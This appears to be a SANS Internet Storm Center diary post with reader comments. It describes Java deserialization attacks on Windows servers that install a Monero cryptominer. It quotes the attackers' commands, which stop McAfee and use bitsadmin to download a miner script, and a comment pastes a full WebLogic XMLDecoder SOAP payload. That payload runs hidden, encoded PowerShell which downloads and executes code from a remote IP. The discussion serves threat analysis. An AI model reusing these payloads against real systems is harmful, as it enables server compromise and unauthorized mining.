|
Recently we talked a lot about attacks exploiting Java deserialization vulnerabilties in systems like Apache SOLR and WebLogic. Most of these attacks targeted Linux/Unix systems. But recently, I am seeing more attacks that target windows. For example:
The actual payload: Turn off McAfee Antivirus (I am not sure what they only turn off McAfee. Any ideas?) net stop "McAfee McShield; Use bitsadmin to download the cryptominer and a batch file to start it from GitHub bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat"; The Batch file: First, it kills other xmrig processes (competition?) . Next, it again turns of McAfee. It then starts the miner and connects to the monerohash.com pool on port 3333. It only uses 50% of the CPU usage, likely to evade detection. So far, this miner only "owns" about 350 Hashes/Second, and made a bit short of 40 Monero so far (about $ 7,000) .
--- |
Johannes 3370 Posts ISC Handler |
| Reply Subscribe |
Apr 3rd 2018 6 months ago |
|
McAfee stack is notorious for heavy resource usage. Maybe, to maximize the available CPU resources, the actor is disabling the McAfee services.
|
Anonymous |
| Reply Quote |
Apr 3rd 2018 6 months ago |
|
Just spit-balling but perhaps the McAfee specification is due to McAfee = DoD HBSS endpoint protection control?
|
Anonymous |
| Reply Quote |
Apr 3rd 2018 6 months ago |
|
Hi Johannes,
I wanted to share this due to the similarity. I have recently encountered a similar attack, identical except for the payload: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> |
Ravenkind 1 Posts |
| Reply Quote |
Apr 3rd 2018 6 months ago |
|
To decode the commenter's example with Base64: Run the Base64 string from Powershell (beginning with J and ending with ==) through Motobit.com's Base64 decoder (change radio button to "decode". You will see the url for the site and php file between the symbols. The unphp.net decode page box can be used to removed the symbols in the string.
|
Unscrambler 1 Posts |
| Reply Quote |
Apr 6th 2018 6 months ago |
Sign Up for Free or Log In to start participating in the conversation!
